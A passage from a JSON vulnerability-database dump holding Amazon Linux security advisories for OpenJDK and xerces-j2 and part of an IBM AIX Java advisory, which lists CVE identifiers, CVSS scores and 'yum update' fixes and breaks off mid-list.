cross-site scripting attacks. ([CVE-2013-5804 __](<https://access.redhat.com/security/cve/CVE-2013-5804>), [CVE-2013-5797 __](<https://access.redhat.com/security/cve/CVE-2013-5797>))\n\nVarious OpenJDK classes that represent cryptographic keys could leak private key information by including sensitive data in strings returned by toString() methods. These flaws could possibly lead to an unexpected exposure of sensitive key data. ([CVE-2013-5780 __](<https://access.redhat.com/security/cve/CVE-2013-5780>))\n\nThe Java Heap Analysis Tool (jhat) failed to properly escape all data added into the HTML pages it generated. Crafted content in the memory of a Java program analyzed using jhat could possibly be used to conduct cross-site scripting attacks. ([CVE-2013-5772 __](<https://access.redhat.com/security/cve/CVE-2013-5772>))\n\nThe Kerberos implementation in OpenJDK did not properly parse KDC responses. A malformed packet could cause a Java application using JGSS to exit. ([CVE-2013-5803 __](<https://access.redhat.com/security/cve/CVE-2013-5803>))\n\n \n**Affected Packages:** \n\n\njava-1.7.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.7.0-openjdk_ to update your system. \n\n \n**New Packages:**\n \n \n i686: \n java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.2.32.amzn1.i686 \n java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.2.32.amzn1.i686 \n java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.2.32.amzn1.i686 \n java-1.7.0-openjdk-1.7.0.45-2.4.3.2.32.amzn1.i686 \n java-1.7.0-openjdk-src-1.7.0.45-2.4.3.2.32.amzn1.i686 \n \n noarch: \n java-1.7.0-openjdk-javadoc-1.7.0.45-2.4.3.2.32.amzn1.noarch \n \n src: \n java-1.7.0-openjdk-1.7.0.45-2.4.3.2.32.amzn1.src \n \n x86_64: \n java-1.7.0-openjdk-debuginfo-1.7.0.45-2.4.3.2.32.amzn1.x86_64 \n java-1.7.0-openjdk-devel-1.7.0.45-2.4.3.2.32.amzn1.x86_64 \n java-1.7.0-openjdk-1.7.0.45-2.4.3.2.32.amzn1.x86_64 \n java-1.7.0-openjdk-src-1.7.0.45-2.4.3.2.32.amzn1.x86_64 \n java-1.7.0-openjdk-demo-1.7.0.45-2.4.3.2.32.amzn1.x86_64 \n \n \n", "published": "2013-10-23T15:22:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://alas.aws.amazon.com/ALAS-2013-235.html", "cvelist": ["CVE-2013-5782", "CVE-2013-4002", "CVE-2013-5850", "CVE-2013-5778", "CVE-2013-5842", "CVE-2013-5830", "CVE-2013-5784", "CVE-2013-5809", "CVE-2013-5802", "CVE-2013-5851", "CVE-2013-5817", "CVE-2013-5825", "CVE-2013-5823", "CVE-2013-5849", "CVE-2013-5780", "CVE-2013-5814", "CVE-2013-5829", "CVE-2013-5803", "CVE-2013-5774", "CVE-2013-3829", "CVE-2013-5783", "CVE-2013-5800", "CVE-2013-5820", "CVE-2013-5790", "CVE-2013-5838", "CVE-2013-5840", "CVE-2013-5797", "CVE-2013-5804", "CVE-2013-5772"], "lastseen": "2016-09-28T21:03:57"}, {"id": "ALAS-2014-436", "type": "amazon", "title": "Medium: xerces-j2", "description": "**Issue Overview:**\n\nA resource consumption issue was found in the way Xerces-J handled XML declarations. A remote attacker could use an XML document with a specially crafted declaration using a long pseudo-attribute name that, when parsed by an application using Xerces-J, would cause that application to use an excessive amount of CPU.\n\n \n**Affected Packages:** \n\n\nxerces-j2\n\n \n**Issue Correction:** \nRun _yum update xerces-j2_ to update your system. \n\n \n**New Packages:**\n \n \n noarch: \n xerces-j2-javadoc-apis-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-javadoc-xni-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-javadoc-other-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-demo-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-scripts-2.7.1-12.7.19.amzn1.noarch \n xerces-j2-javadoc-impl-2.7.1-12.7.19.amzn1.noarch \n \n src: \n xerces-j2-2.7.1-12.7.19.amzn1.src \n \n \n", "published": "2014-10-28T17:13:00", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://alas.aws.amazon.com/ALAS-2014-436.html", "cvelist": ["CVE-2013-4002"], "lastseen": "2016-09-28T21:04:06"}, {"id": "ALAS-2014-326", "type": "amazon", "title": "Important: java-1.6.0-openjdk", "description": "**Issue Overview:**\n\nAn input validation flaw was discovered in the medialib library in the 2D component. A specially crafted image could trigger Java Virtual Machine memory corruption when processed. A remote attacker, or an untrusted Java application or applet, could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. ([CVE-2014-0429 __](<https://access.redhat.com/security/cve/CVE-2014-0429>))\n\nMultiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions. ([CVE-2014-0456 __](<https://access.redhat.com/security/cve/CVE-2014-0456>), [CVE-2014-2397 __](<https://access.redhat.com/security/cve/CVE-2014-2397>), [CVE-2014-2421 __](<https://access.redhat.com/security/cve/CVE-2014-2421>))\n\nMultiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. ([CVE-2014-0457 __](<https://access.redhat.com/security/cve/CVE-2014-0457>), [CVE-2014-0461 __](<https://access.redhat.com/security/cve/CVE-2014-0461>))\n\nMultiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, and Sound components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. ([CVE-2014-2412 __](<https://access.redhat.com/security/cve/CVE-2014-2412>), [CVE-2014-0451 __](<https://access.redhat.com/security/cve/CVE-2014-0451>), [CVE-2014-0458 __](<https://access.redhat.com/security/cve/CVE-2014-0458>), [CVE-2014-2423 __](<https://access.redhat.com/security/cve/CVE-2014-2423>), [CVE-2014-0452 __](<https://access.redhat.com/security/cve/CVE-2014-0452>), [CVE-2014-2414 __](<https://access.redhat.com/security/cve/CVE-2014-2414>), [CVE-2014-0446 __](<https://access.redhat.com/security/cve/CVE-2014-0446>), [CVE-2014-2427 __](<https://access.redhat.com/security/cve/CVE-2014-2427>))\n\nMultiple flaws were identified in the Java Naming and Directory Interface (JNDI) DNS client. These flaws could make it easier for a remote attacker to perform DNS spoofing attacks. ([CVE-2014-0460 __](<https://access.redhat.com/security/cve/CVE-2014-0460>))\n\nIt was discovered that the JAXP component did not properly prevent access to arbitrary files when a SecurityManager was present. This flaw could cause a Java application using JAXP to leak sensitive information, or affect application availability. ([CVE-2014-2403 __](<https://access.redhat.com/security/cve/CVE-2014-2403>))\n\nIt was discovered that the Security component in OpenJDK could leak some timing information when performing PKCS#1 unpadding. This could possibly lead to the disclosure of some information that was meant to be protected by encryption. ([CVE-2014-0453 __](<https://access.redhat.com/security/cve/CVE-2014-0453>))\n\nIt was discovered that the fix for [CVE-2013-5797 __](<https://access.redhat.com/security/cve/CVE-2013-5797>) did not properly resolve input sanitization flaws in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting (XSS) attacks. ([CVE-2014-2398 __](<https://access.redhat.com/security/cve/CVE-2014-2398>))\n\nAn insecure temporary file use flaw was found in the way the unpack200 utility created log files. A local attacker could possibly use this flaw to perform a symbolic link attack and overwrite arbitrary files with the privileges of the user running unpack200. ([CVE-2014-1876 __](<https://access.redhat.com/security/cve/CVE-2014-1876>))\n\n \n**Affected Packages:** \n\n\njava-1.6.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.6.0-openjdk_ to update your system. \n\n \n**New Packages:**\n \n \n i686: \n java-1.6.0-openjdk-demo-1.6.0.0-67.1.13.3.64.amzn1.i686 \n java-1.6.0-openjdk-javadoc-1.6.0.0-67.1.13.3.64.amzn1.i686 \n java-1.6.0-openjdk-src-1.6.0.0-67.1.13.3.64.amzn1.i686 \n java-1.6.0-openjdk-1.6.0.0-67.1.13.3.64.amzn1.i686 \n java-1.6.0-openjdk-devel-1.6.0.0-67.1.13.3.64.amzn1.i686 \n java-1.6.0-openjdk-debuginfo-1.6.0.0-67.1.13.3.64.amzn1.i686 \n \n src: \n java-1.6.0-openjdk-1.6.0.0-67.1.13.3.64.amzn1.src \n \n x86_64: \n java-1.6.0-openjdk-devel-1.6.0.0-67.1.13.3.64.amzn1.x86_64 \n java-1.6.0-openjdk-src-1.6.0.0-67.1.13.3.64.amzn1.x86_64 \n java-1.6.0-openjdk-demo-1.6.0.0-67.1.13.3.64.amzn1.x86_64 \n java-1.6.0-openjdk-debuginfo-1.6.0.0-67.1.13.3.64.amzn1.x86_64 \n java-1.6.0-openjdk-javadoc-1.6.0.0-67.1.13.3.64.amzn1.x86_64 \n java-1.6.0-openjdk-1.6.0.0-67.1.13.3.64.amzn1.x86_64 \n \n \n", "published": "2014-04-17T23:53:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://alas.aws.amazon.com/ALAS-2014-326.html", "cvelist": ["CVE-2014-2397", "CVE-2014-0457", "CVE-2014-0446", "CVE-2014-1876", "CVE-2014-0458", "CVE-2014-2427", "CVE-2014-0453", "CVE-2014-0461", "CVE-2014-0456", "CVE-2014-0429", "CVE-2014-2403", "CVE-2014-2412", "CVE-2014-2421", "CVE-2014-0460", "CVE-2014-2423", "CVE-2014-2398", "CVE-2014-0451", "CVE-2014-0452", "CVE-2014-2414", "CVE-2013-5797"], "lastseen": "2016-09-28T21:04:06"}, {"id": "ALAS-2014-327", "type": "amazon", "title": "Critical: java-1.7.0-openjdk", "description": "**Issue Overview:**\n\nAn input validation flaw was discovered in the medialib library in the 2D component. A specially crafted image could trigger Java Virtual Machine memory corruption when processed. A remote attacker, or an untrusted Java application or applet, could possibly use this flaw to execute arbitrary code with the privileges of the user running the Java Virtual Machine. ([CVE-2014-0429 __](<https://access.redhat.com/security/cve/CVE-2014-0429>))\n\nMultiple flaws were discovered in the Hotspot and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to trigger Java Virtual Machine memory corruption and possibly bypass Java sandbox restrictions. ([CVE-2014-0456 __](<https://access.redhat.com/security/cve/CVE-2014-0456>), [CVE-2014-2397 __](<https://access.redhat.com/security/cve/CVE-2014-2397>), [CVE-2014-2421 __](<https://access.redhat.com/security/cve/CVE-2014-2421>))\n\nMultiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. ([CVE-2014-0457 __](<https://access.redhat.com/security/cve/CVE-2014-0457>), [CVE-2014-0455 __](<https://access.redhat.com/security/cve/CVE-2014-0455>), [CVE-2014-0461 __](<https://access.redhat.com/security/cve/CVE-2014-0461>))\n\nMultiple improper permission check issues were discovered in the AWT, JAX-WS, JAXB, Libraries, Security, Sound, and 2D components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions. ([CVE-2014-2412 __](<https://access.redhat.com/security/cve/CVE-2014-2412>), [CVE-2014-0451 __](<https://access.redhat.com/security/cve/CVE-2014-0451>), [CVE-2014-0458 __](<https://access.redhat.com/security/cve/CVE-2014-0458>), [CVE-2014-2423 __](<https://access.redhat.com/security/cve/CVE-2014-2423>), [CVE-2014-0452 __](<https://access.redhat.com/security/cve/CVE-2014-0452>), [CVE-2014-2414 __](<https://access.redhat.com/security/cve/CVE-2014-2414>), [CVE-2014-2402 __](<https://access.redhat.com/security/cve/CVE-2014-2402>), [CVE-2014-0446 __](<https://access.redhat.com/security/cve/CVE-2014-0446>), [CVE-2014-2413 __](<https://access.redhat.com/security/cve/CVE-2014-2413>), [CVE-2014-0454 __](<https://access.redhat.com/security/cve/CVE-2014-0454>), [CVE-2014-2427 __](<https://access.redhat.com/security/cve/CVE-2014-2427>), [CVE-2014-0459 __](<https://access.redhat.com/security/cve/CVE-2014-0459>))\n\nMultiple flaws were identified in the Java Naming and Directory Interface (JNDI) DNS client. These flaws could make it easier for a remote attacker to perform DNS spoofing attacks. ([CVE-2014-0460 __](<https://access.redhat.com/security/cve/CVE-2014-0460>))\n\nIt was discovered that the JAXP component did not properly prevent access to arbitrary files when a SecurityManager was present. This flaw could cause a Java application using JAXP to leak sensitive information, or affect application availability. ([CVE-2014-2403 __](<https://access.redhat.com/security/cve/CVE-2014-2403>))\n\nIt was discovered that the Security component in OpenJDK could leak some timing information when performing PKCS#1 unpadding. This could possibly lead to the disclosure of some information that was meant to be protected by encryption. ([CVE-2014-0453 __](<https://access.redhat.com/security/cve/CVE-2014-0453>))\n\nIt was discovered that the fix for [CVE-2013-5797 __](<https://access.redhat.com/security/cve/CVE-2013-5797>) did not properly resolve input sanitization flaws in javadoc. When javadoc documentation was generated from an untrusted Java source code and hosted on a domain not controlled by the code author, these issues could make it easier to perform cross-site scripting (XSS) attacks. ([CVE-2014-2398 __](<https://access.redhat.com/security/cve/CVE-2014-2398>))\n\nAn insecure temporary file use flaw was found in the way the unpack200 utility created log files. A local attacker could possibly use this flaw to perform a symbolic link attack and overwrite arbitrary files with the privileges of the user running unpack200. ([CVE-2014-1876 __](<https://access.redhat.com/security/cve/CVE-2014-1876>))\n\n \n**Affected Packages:** \n\n\njava-1.7.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.7.0-openjdk_ to update your system. \n\n \n**New Packages:**\n \n \n i686: \n java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.40.amzn1.i686 \n java-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.40.amzn1.i686 \n java-1.7.0-openjdk-1.7.0.55-2.4.7.1.40.amzn1.i686 \n java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.40.amzn1.i686 \n java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.40.amzn1.i686 \n \n noarch: \n java-1.7.0-openjdk-javadoc-1.7.0.55-2.4.7.1.40.amzn1.noarch \n \n src: \n java-1.7.0-openjdk-1.7.0.55-2.4.7.1.40.amzn1.src \n \n x86_64: \n java-1.7.0-openjdk-debuginfo-1.7.0.55-2.4.7.1.40.amzn1.x86_64 \n java-1.7.0-openjdk-1.7.0.55-2.4.7.1.40.amzn1.x86_64 \n java-1.7.0-openjdk-demo-1.7.0.55-2.4.7.1.40.amzn1.x86_64 \n java-1.7.0-openjdk-src-1.7.0.55-2.4.7.1.40.amzn1.x86_64 \n java-1.7.0-openjdk-devel-1.7.0.55-2.4.7.1.40.amzn1.x86_64 \n \n \n", "published": "2014-04-17T23:55:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://alas.aws.amazon.com/ALAS-2014-327.html", "cvelist": ["CVE-2014-2397", "CVE-2014-0457", "CVE-2014-0455", "CVE-2014-0446", "CVE-2014-1876", "CVE-2014-0458", "CVE-2014-2427", "CVE-2014-2413", "CVE-2014-0454", "CVE-2014-0453", "CVE-2014-0461", "CVE-2014-0459", "CVE-2014-0456", "CVE-2014-0429", "CVE-2014-2403", "CVE-2014-2412", "CVE-2014-2421", "CVE-2014-0460", "CVE-2014-2423", "CVE-2014-2398", "CVE-2014-0451", "CVE-2014-0452", "CVE-2014-2414", "CVE-2013-5797", "CVE-2014-2402"], "lastseen": "2016-09-28T21:03:57"}], "aix": [{"id": "JAVA_ADVISORY.ASC", "type": "aix", "title": "Multiple Java vulnerabilities", "description": "-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nIBM SECURITY ADVISORY\n\nFirst Issued: Wed Dec 11 10:53:34 CST 2013\n| Updated: Mon Feb 3 10:36:58 CST 2014\n| Updated: Sections II and III modifications\n| Updated: Includes VIOS\n\nThe most recent version of this document is available here:\n\nhttps://aix.software.ibm.com/aix/efixes/security/java_advisory.asc\nftp://aix.software.ibm.com/aix/efixes/security/java_advisory.asc\n\n===============================================================================\n VULNERABILITY SUMMARY\n\nVULNERABILITY: Multiple vulnerabilities in current releases of the IBM\u00ae SDK,\n\t\t\t\t Java Technology Edition.\n\nPLATFORMS: PowerSC and AIX 5.3, 6.1 and 7.1.\n| VIOS 2.2.x\n\nSOLUTION: Apply the fix as described below.\n\nTHREAT: Varies threats described below.\n\nCERT VU Number: n/a\nCVE Numbers: CVE-2013-5456 CVE-2013-5457 CVE-2013-5458 CVE-2013-4041 \n CVE-2013-5375 CVE-2013-5372 CVE-2013-5843 CVE-2013-5789 \n CVE-2013-5830 CVE-2013-5829 CVE-2013-5787 CVE-2013-5788 \n CVE-2013-5824 CVE-2013-5842 CVE-2013-5782 CVE-2013-5817 \n CVE-2013-5809 CVE-2013-5814 CVE-2013-5832 CVE-2013-5850 \n CVE-2013-5838 CVE-2013-5802 CVE-2013-5812 CVE-2013-5804 \n CVE-2013-5783 CVE-2013-3829 CVE-2013-5823 CVE-2013-5831 \n CVE-2013-5820 CVE-2013-5819 CVE-2013-5818 CVE-2013-5848 \n CVE-2013-5776 CVE-2013-5774 CVE-2013-5825 CVE-2013-5840 \n CVE-2013-5801 CVE-2013-5778 CVE-2013-5851 CVE-2013-5800 \n CVE-2013-5784 CVE-2013-5849 CVE-2013-5790 CVE-2013-5780 \n CVE-2013-5797 CVE-2013-5803 CVE-2013-5772 \n\n|Reboot required? NO\n|Workarounds? NO\n \n===============================================================================\n DETAILED INFORMATION\n\nI. DESCRIPTION\n\n There are a number of vulnerabilities in the IBM SDK, Java Technology\n Edition that affect various components. CVE-2013-5456, CVE-2013-5457 and\n CVE-2013-5458 allow code running under a security manager to escalate its\n privileges by modifying or removing the security manager. CVE-2013-4041 \n and CVE-2013-5375 allow code running under a security manager to access \n restricted classes. These vulnerabilities could occur when untrusted code \n is executed under a security manager, or when the IBM SDK, Java Technology\n Edition has been associated with a web browser for running applets and Web\n Start applications.\n\n CVE-2013-5372 is a denial of service vulnerability which could result in a \n complete availability impact on the affected system.\n\n This bulletin also covers all applicable CVEs published by Oracle as part \n of their October 2013 Java SE Critical Patch Update. For more information \n please refer to Oracle's October 2013 Java SE CPU Advisory. \n\nII. CVSS\n\n CVEID: CVE-2013-5456\n CVSS Base Score: 9.3\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/88255 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C)\n\n CVEID: CVE-2013-5457\n CVSS Base Score: 9.3\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/88256 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C)\n\n CVEID: CVE-2013-5458\n CVSS Base Score: 9.3\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/88257 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:M/Au:N/C:C/I:C/A:C)\n\n CVEID: CVE-2013-4041\n CVSS Base Score: 6.8\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/86416 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:M/Au:N/C:P/I:P/A:P)\n\n CVEID: CVE-2013-5375\n CVSS Base Score: 4.3\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/86901 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n CVEID: CVE-2013-5372\n CVSS Base Score: 4.3\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/86662 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n CVEID: CVE-2013-5843\n CVSS Base Score: 10\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87971 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/C:I/C:A/C)\n\n CVEID: CVE-2013-5789\n CVSS Base Score: 10\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87968 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/C:I/C:A/C)\n\n CVEID: CVE-2013-5830\n CVSS Base Score: 10\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87961 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/C:I/C:A/C)\n\n CVEID: CVE-2013-5829\n CVSS Base Score: 10\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87963 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/C:I/C:A/C)\n\n CVEID: CVE-2013-5787\n CVSS Base Score: 10\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87967 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/C:I/C:A/C)\n\n CVEID: CVE-2013-5788\n CVSS Base Score: 10\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87966 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/C:I/C:A/C)\n\n CVEID: CVE-2013-5824\n CVSS Base Score: 10\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87965 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/C:I/C:A/C)\n\n CVEID: CVE-2013-5842\n CVSS Base Score: 10\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87970 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/C:I/C:A/C)\n\n CVEID: CVE-2013-5782\n CVSS Base Score: 10\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87960 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/C:I/C:A/C)\n\n CVEID: CVE-2013-5817\n CVSS Base Score: 10\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87969 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/C:I/C:A/C)\n\n CVEID: CVE-2013-5809\n CVSS Base Score: 10\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87962 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/C:I/C:A/C)\n\n CVEID: CVE-2013-5814\n CVSS Base Score: 10\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87964 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/C:I/C:A/C)\n\n CVEID: CVE-2013-5832\n CVSS Base Score: 9.3\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87972 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/M:Au/N:C/C:I/C:A/C)\n\n CVEID: CVE-2013-5850\n CVSS Base Score: 9.3\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87973 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/M:Au/N:C/C:I/C:A/C)\n\n CVEID: CVE-2013-5838\n CVSS Base Score: 9.3\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87974 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/M:Au/N:C/C:I/C:A/C)\n\n CVEID: CVE-2013-5802\n CVSS Base Score: 7.5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87982 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/P:I/P:A/P)\n\n CVEID: CVE-2013-5812\n CVSS Base Score: 6.4\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87985 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/P:I/N:A/P)\n\n CVEID: CVE-2013-5804\n CVSS Base Score: 6.4\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87984 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/P:I/P:A/N)\n\n CVEID: CVE-2013-5783\n CVSS Base Score: 6.4\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87987 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/P:I/P:A/N)\n\n CVEID: CVE-2013-3829\n CVSS Base Score: 6.4\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87986 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/P:I/P:A/N)\n\n CVEID: CVE-2013-5823\n CVSS Base Score: 5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87989 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/N:I/N:A/P)\n\n CVEID: CVE-2013-5831\n CVSS Base Score: 5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87995 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/N:I/P:A/N)\n\n CVEID: CVE-2013-5820\n CVSS Base Score: 5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87996 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/N:I/P:A/N)\n\n CVEID: CVE-2013-5819\n CVSS Base Score: 5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87994 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/N:I/P:A/N)\n\n CVEID: CVE-2013-5818\n CVSS Base Score: 5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87993 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/N:I/P:A/N)\n\n CVEID: CVE-2013-5848\n CVSS Base Score: 5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/88000 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/N:I/P:A/N)\n\n CVEID: CVE-2013-5776\n CVSS Base Score: 5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87992 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/N:I/P:A/N)\n\n CVEID: CVE-2013-5774\n CVSS Base Score: 5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87999 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/N:I/P:A/N)\n\n CVEID: CVE-2013-5825\n CVSS Base Score: 5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87988 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/N:I/N:A/P)\n\n CVEID: CVE-2013-5840\n CVSS Base Score: 5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87998 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/P:I/N:A/N)\n\n CVEID: CVE-2013-5801\n CVSS Base Score: 5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87991 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/P:I/N:A/N)\n\n CVEID: CVE-2013-5778\n CVSS Base Score: 5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87990 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/P:I/N:A/N)\n\n CVEID: CVE-2013-5851\n CVSS Base Score: 5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/87997 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/L:Au/N:C/P:I/N:A/N)\n\n CVEID: CVE-2013-5800\n CVSS Base Score: 4.3\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/88002 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/M:Au/N:C/P:I/N:A/N)\n\n CVEID: CVE-2013-5784\n CVSS Base Score: 4.3\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/88005 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/M:Au/N:C/N:I/P:A/N)\n \n CVEID: CVE-2013-5849\n CVSS Base Score: 4.3\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/88003 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/M:Au/N:C/P:I/N:A/N)\n\n CVEID: CVE-2013-5790\n CVSS Base Score: 4.3\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/88004 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/M:Au/N:C/P:I/N:A/N)\n\n CVEID: CVE-2013-5780\n CVSS Base Score: 4.3\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/88001 for the current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV/N:AC/M:Au/N:C/P:I/N:A/N)\n\n CVEID: CVE-2013-5797\n CVSS Base Score: 3.5\n CVSS Temporal Score: See http://xforce.iss.net/xforce/xfdb/88006 for the current score\n CVSS Environmental Score*: 